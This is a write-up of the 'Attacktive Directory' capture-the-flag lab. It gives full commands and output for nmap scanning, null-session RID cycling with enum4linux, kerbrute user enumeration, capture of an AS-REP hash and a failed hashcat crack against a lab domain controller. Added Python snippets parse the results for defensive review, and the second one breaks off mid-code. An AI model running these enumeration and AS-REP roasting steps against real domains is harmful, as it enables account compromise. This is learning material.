Attacktive Directory
Alright, this seems like a good next step for my journey. I know AD is used everywhere; I've even used it myself a few times for OIDC auth in front of cloud applications. But I've never interfaced with it directly, and I know this is something I'll need to know how to do, so let's get to it!
Installing Impacket
$ git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Cloning into '/opt/impacket'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 18881 (delta 14), reused 21 (delta 7), pack-reused 18845
Receiving objects: 100% (18881/18881), 6.26 MiB | 12.57 MiB/s, done.
Resolving deltas: 100% (14364/14364), done.
$ pip3 install -r /opt/impacket/requirements.txt
Ignoring pyreadline: markers 'sys_platform == "win32"' don't match your environment
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 2)) (1.15.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 3)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 4)) (3.9.7)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 5)) (20.0.1)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 6)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 7)) (0.9.3)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 8)) (1.1.2)
$ cd /opt/impacket/ && python3 ./setup.py install
... Installs ...
Enumerate the DC Pt. 1
Alright, I do know that DC means Domain Controller. At least I have that going for me! Well, it asks me to use a popular enumeration tool to reveal some information... To start I'm just going to nmap this and see what's going on there:
# sudo nmap -n -Pn -p- --script vuln 10.10.203.98
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:50 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Stats: 0:13:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:04 (0:00:00 remaining)
Stats: 0:15:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.203.98
Host is up (0.12s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
|_sslv2-drown:
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_sslv2-drown:
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_sslv2-drown:
3389/tcp open ms-wbt-server
|_sslv2-drown:
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49673/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49696/tcp open unknown
49814/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 981.94 seconds
A quick search for how to enumerate Windows AD gives enum4linux as the first result, which is the correct first answer.
Alright, I guess we should run that against the host then!
$ sudo enum4linux 10.10.203.98 255 ⨯
[sudo] password for kali:
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 3 10:52:23 2021
==========================
| Target Information |
==========================
Target ........... 10.10.203.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.203.98 |
====================================================
[E] Can't find workgroup/domain
============================================
| Nbtstat Information for 10.10.203.98 |
============================================
Looking up status of 10.10.203.98
No reply from 10.10.203.98
=====================================
| Session Check on 10.10.203.98 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.203.98 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
===========================================
| Getting domain SID for 10.10.203.98 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.203.98 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.203.98 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.203.98 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.203.98 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=========================================
| Share Enumeration on 10.10.203.98 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.203.98
====================================================
| Password Policy Information for 10.10.203.98 |
====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.203.98 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.203.98)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[E] Failed to get password policy with rpcclient
==============================
| Groups on 10.10.203.98 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.203.98 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
=============================================
| Getting printer info for 10.10.203.98 |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Mar 3 10:56:54 2021
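The RID-cycling block is the security-relevant part of this output: the server accepted a null session (username '' / password '', as the Session Check above shows), and from there enum4linux translated RIDs 500-550 and 1000-1050 into account and group names without any credentials at all. As an added example, not part of the original writeup, the following Python parses that output (SAMPLE_OUTPUT is a subset of the lines above, with one of the interleaved Perl warnings kept in so the parser has to skip it), separates the domain SID's accounts from the other SID that came back, and flags the well-known privileged RIDs and the machine account. The well-known RID table is the standard Windows one; nothing in it is specific to this box.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the enum4linux output shown above, including one of
# the Perl "uninitialized value" warnings that the real tool interleaves with results.
SAMPLE_OUTPUT = """\
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\\ATTACKTIVEDIREC$ (Local User)
"""

# Well-known RIDs that exist in every domain; the suffix is fixed whatever the domain SID is.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 518: "Schema Admins",
    519: "Enterprise Admins", 520: "Group Policy Creator Owners",
}
PRIVILEGED_RIDS = {500, 512, 518, 519}

# One "<SID>-<RID> <domain>\<name> (<kind>)" result line as enum4linux prints it.
SID_LINE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+) (.+?)\\(.+?) \((.+)\)$")


def parse_enum4linux(text):
    """Return the domain name/SID and every principal enum4linux resolved by RID cycling."""
    result = {"domain_name": None, "domain_sid": None, "accounts": []}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Domain Name:"):
            result["domain_name"] = line.split(":", 1)[1].strip()
        elif line.startswith("Domain Sid:"):
            result["domain_sid"] = line.split(":", 1)[1].strip()
        m = SID_LINE.match(line)
        if not m:
            continue  # banners, separators and Perl warnings are skipped
        sid, rid, domain, name, kind = m.groups()
        result["accounts"].append({
            "sid": sid, "rid": int(rid), "domain": domain, "name": name,
            "kind": kind, "well_known": WELL_KNOWN_RIDS.get(int(rid)),
        })
    return result


def summarize(parsed):
    """Group results by SID and pull out what an anonymous caller should never have seen."""
    by_sid = defaultdict(list)
    for acct in parsed["accounts"]:
        by_sid[acct["sid"]].append(acct)
    domain_accts = by_sid.get(parsed["domain_sid"], [])
    return {
        "domain_accounts": [a["name"] for a in domain_accts],
        "privileged": [a["name"] for a in domain_accts if a["rid"] in PRIVILEGED_RIDS],
        "machine_accounts": [a["name"] for a in parsed["accounts"] if a["name"].endswith("$")],
        "other_sids": sorted(s for s in by_sid if s != parsed["domain_sid"]),
    }


if __name__ == "__main__":
    parsed = parse_enum4linux(SAMPLE_OUTPUT)
    print(parsed["domain_name"], parsed["domain_sid"])
    for key, value in summarize(parsed).items():
        print(f"{key}: {value}")
```

This is the exposure that the "Network access: Allow anonymous SID/Name translation" and "Network access: Restrict anonymous access to Named Pipes and Shares" policies exist to close; a parser like this turns a noisy enum4linux run into a short list that can be re-checked after the policy change.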
Alright, so most of the answers in this section were obvious from the default output; however, I don't know why a top-level domain could cause issues... samba.org explains:
In this scenario you would name your domain in the format of "domain.invalid.tld" such as "SAMDOM.local". Using an invalid top-level domain (TLD) such as .local or .internal used to be a very common practice. In fact all versions of Microsoft's Small Business Servers were configured to use a domain in the form of "domain.local". Since the .local TLD is officially reserved by ICANN, you can also be assured that no external DNS server will resolve this domain. However this style of name has a few major issues:
The .local TLD is used by some zeroconf systems, most importantly Apple's Bonjour service. Using them together will not work correctly.
Invalid TLDs, such as .local or .internal, will soon be unable to get SSL certificates from any of the major certificate providers. The CA/Browser Forum has decided that no certificates should be issued for these invalid domains starting November 1, 2015. In fact, you are now unable to purchase a certificate for these names if they expire after this date. This includes Subject Alternative Names (SAN) used within otherwise valid certificates (this is a very common configuration for Microsoft Exchange). While internal certificate authorities have no such restriction, having this option open to you is always a good thing.
It is possible that the invalid TLD you are now using, could become a valid TLD in the future. While .local is reserved by ICANN, the TLD system is currently scheduled to undergo a vast expansion of the generic TLD (gTLD) it supports, from 22 to over a thousand new names. This trend is likely to continue.
For the same reason, names with other invalid TLDs should be avoided, including .internal and .lan
.local was the answer!
Enumerate the DC Pt. 2
We're being instructed to use kerbrute to brute-force with a given username/password list. I guess this one is for learning purposes, but this is pretty lame in my opinion. A pruned username/password list?! Sigh...
Install kerbrute
┌──(kali㉿kali)-[~/scripts]
└─$ go get github.com/ropnop/kerbrute 100 ⨯
┌──(kali㉿kali)-[~/scripts]
└─$ make all
make: *** No rule to make target 'all'. Stop.
┌──(kali㉿kali)-[~/scripts]
└─$ kerbrute 2 ⨯
zsh: command not found: kerbrute
┌──(kali㉿kali)-[~/scripts]
└─$ cd $GOPATH 127 ⨯
┌──(kali㉿kali)-[~]
└─$ ls
config Desktop Documents Downloads go Music peda Pictures Public result.txt scripts Templates test.sh tmp t.sh Videos vpn x.sh
┌──(kali㉿kali)-[~]
└─$ cd go
┌──(kali㉿kali)-[~/go]
└─$ cd src
┌──(kali㉿kali)-[~/go/src]
└─$ ls
github.com golang.org
┌──(kali㉿kali)-[~/go/src]
└─$ cd github.com
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ ls
hashicorp jcmturner op ropnop spf13
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ cd ropnop
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ ls
gokrb5 kerbrute
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ cd kerbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ mnake all
zsh: command not found: mnake
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ make all 127 ⨯
go: downloading github.com/op/go-logging v0.0.0-20160315200505-970db520ece7
go: downloading github.com/ropnop/gokrb5/v8 v8.0.0-20201111231119-729746023c02
go: downloading github.com/spf13/cobra v1.1.1
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/jcmturner/gofork v1.0.0
go: downloading github.com/jcmturner/dnsutils/v2 v2.0.0
go: downloading golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897
go: downloading github.com/jcmturner/rpc/v2 v2.0.2
go: downloading github.com/jcmturner/aescts/v2 v2.0.0
go: downloading github.com/hashicorp/go-uuid v1.0.2
go: downloading golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
cd /home/kali/go/src/github.com/ropnop/kerbrute
rm -f kerbrute kerbrute.exe kerbrute.test kerbrute.test.exe main main.exe
rm -f /home/kali/go/bin/kerbrute
Done.
Building for windows amd64..
go: downloading github.com/inconshreveable/mousetrap v1.0.0
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
cmd/go: unsupported GOOS/GOARCH pair darwin/386
make: *** [Makefile:42: mac] Error 1
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kernbrute 2 ⨯
zsh: command not found: kernbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kerbrute 127 ⨯
zsh: command not found: kerbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ ls 127 ⨯
cmd dist go.mod go.sum LICENSE main.go Makefile README.md session util
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ cd dist
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls
kerbrute_darwin_amd64 kerbrute_linux_386 kerbrute_linux_amd64 kerbrute_windows_386.exe kerbrute_windows_amd64.exe
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ kernel-install
Not enough arguments
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls -al 1 ⨯
total 37300
drwxr-xr-x 2 kali kali 4096 Mar 3 11:37 .
drwxr-xr-x 8 kali kali 4096 Mar 3 11:37 ..
-rwxr-xr-x 1 kali kali 7988312 Mar 3 11:37 kerbrute_darwin_amd64
-rwxr-xr-x 1 kali kali 7018814 Mar 3 11:37 kerbrute_linux_386
-rwxr-xr-x 1 kali kali 8153622 Mar 3 11:37 kerbrute_linux_amd64
-rwxr-xr-x 1 kali kali 7028736 Mar 3 11:37 kerbrute_windows_386.exe
-rwxr-xr-x 1 kali kali 7991296 Mar 3 11:37 kerbrute_windows_amd64.exe
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ./kerbrute_linux_amd64
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
--downgrade Force downgraded encryption type (arcfour-hmac-md5)
--hash-file string File to save AS-REP hashes to (if any captured), otherwise just logged
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ mv ./kerbrute_linux_amd64 /usr/bin/kerbrute
mv: cannot move './kerbrute_linux_amd64' to '/usr/bin/kerbrute': Permission denied
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo !! 1 ⨯
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo mv ./kerbrute_linux_amd64 /usr/bin/kerbrute 1 ⨯
[sudo] password for kali:
$ cd ~ && which kerbrute
/usr/bin/kerbrute
Download the wordlists
$ cd ~ && mkdir tmp && cd tmp
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
$ ls -al
total 1292
drwxr-xr-x 2 kali kali 4096 Mar 3 11:40 .
drwxr-xr-x 30 kali kali 4096 Mar 3 11:39 ..
-rw-r--r-- 1 kali kali 569236 Mar 3 11:40 passwordlist.txt
-rw-r--r-- 1 kali kali 744407 Mar 3 11:40 userlist.txt
$ kerbrute userenum --dc 10.10.203.98 -d THM-AD ./userlist.txt 1 ⨯
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop
2021/03/03 11:43:03 > Using KDC(s):
2021/03/03 11:43:03 > 10.10.203.98:88
2021/03/03 11:43:03 > [+] VALID USERNAME: james@THM-AD
2021/03/03 11:43:05 > [+] svc-admin has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$svc-admin@SPOOKYSEC.LOCAL:4715c0c49c0041ef374f45ed323315fd$b5ffae20417b39577f4f70fffb86280df075b8a030927c7e662d83cac8bb309fbc3f771eb77f0816cd379be1362cca367132befeee1d08f51d074e48bfc8e693c4d0096b7ed49e29e28a6d7b63b500d840c5681f4f6bb6e3c874f7fb11c3a0c28e924624298eb609b5c696541414b13d9eb15850fbe6b30ca1379a504694b1ccd847c31576c80cbc71db45263c4b492bd6d1ece1387d45540f47d8ab6ed8adb6b77c17d732c9183faa8a278f34dfb4da2e25df78ee55c819a4ad1cb2b702038f9adb7d0afe7222925d98b7f7ce6c4f53f7f432051133420748315c026d908834d3c1f70deb1388d6693d9eec271a16e25a48d8822eb458522560c25199
2021/03/03 11:43:05 > [+] VALID USERNAME: svc-admin@THM-AD
2021/03/03 11:43:07 > [+] VALID USERNAME: James@THM-AD
2021/03/03 11:43:08 > [+] VALID USERNAME: robin@THM-AD
2021/03/03 11:43:16 > [+] VALID USERNAME: darkstar@THM-AD
2021/03/03 11:43:22 > [+] VALID USERNAME: administrator@THM-AD
2021/03/03 11:43:33 > [+] VALID USERNAME: backup@THM-AD
2021/03/03 11:43:38 > [+] VALID USERNAME: paradox@THM-AD
2021/03/03 11:44:10 > [+] VALID USERNAME: JAMES@THM-AD
2021/03/03 11:44:21 > [+] VALID USERNAME: Robin@THM-AD
2021/03/03 11:45:23 > [+] VALID USERNAME: Administrator@THM-AD
Alright, time to crack that hash. I switched over to my Windows host, which can use my GPU:
C:\Users\matth\Desktop\Security\cracking\hashcat-6.1.1\hashcat-6.1.1>hashcat.exe -m 18200 -a 0 -o result.txt ..\..\hashes\1.txt ..\..\wordlist\1.txt
hashcat (v6.1.1) starting...
* Device #1: CUDA SDK Toolkit installation NOT detected.
CUDA SDK Toolkit installation required for proper device support and utilization
Falling back to OpenCL Runtime
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.109) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080 Ti, 9664/11264 MB (2816 MB allocatable), 68MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1169 MB
Dictionary cache built:
* Filename..: ..\..\wordlist\1.txt
* Passwords.: 70188
* Bytes.....: 639424
* Keyspace..: 70188
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:4715c0c49c0...c25199
Time.Started.....: Wed Mar 03 12:08:15 2021 (1 sec)
Time.Estimated...: Wed Mar 03 12:08:16 2021 (0 secs)
Guess.Base.......: File (..\..\wordlist\1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56258.4 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 70188/70188 (100.00%)
Rejected.........: 0/70188 (0.00%)
Restore.Point....: 70188/70188 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> pinkk
Hardware.Mon.#1..: Temp: 36c Fan: 0% Util: 48% Core:1965MHz Mem:6800MHz Bus:16
Started: Wed Mar 03 12:08:14 2021
Stopped: Wed Mar 03 12:08:16 2021
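One detail worth pausing on before moving to the next section: kerbrute labelled the AS-REP it captured with etype 18 (aes256-cts-hmac-sha1-96), while the hashcat session above targets $krb5asrep$23$... with -m 18200, a mode that only implements RC4-HMAC (etype 23), and the session ends with Status Exhausted. An AES ciphertext whose header has been rewritten to 23 will never verify under the RC4 routine, whatever the wordlist contains. kerbrute's own --downgrade flag (listed in its help text above) asks the KDC for an RC4 reply, which is the encryption type mode 18200 expects. As an added example, not from the original writeup, the Python below parses the $krb5asrep$ line into its fields and reports whether the mode used here fits the etype, then does the defender's half of the job: given (sAMAccountName, userAccountControl) pairs as an LDAP query would return them, it lists the enabled accounts with DONT_REQ_PREAUTH set, the setting that made svc-admin roastable in the first place. ASREP_LINE is the page's hash with the ciphertext shortened; SAMPLE_ENTRIES and the account old-svc are constructed values, not the real attributes of accounts on this box.

```python
import re

# The AS-REP line kerbrute printed above, with the ciphertext shortened; only the
# header fields matter for what follows.
ASREP_LINE = ("$krb5asrep$18$svc-admin@SPOOKYSEC.LOCAL:"
              "4715c0c49c0041ef374f45ed323315fd$b5ffae20417b39577f4f70fffb86280df075b8a030927c7e")

# Kerberos encryption type numbers (IANA Kerberos registry).
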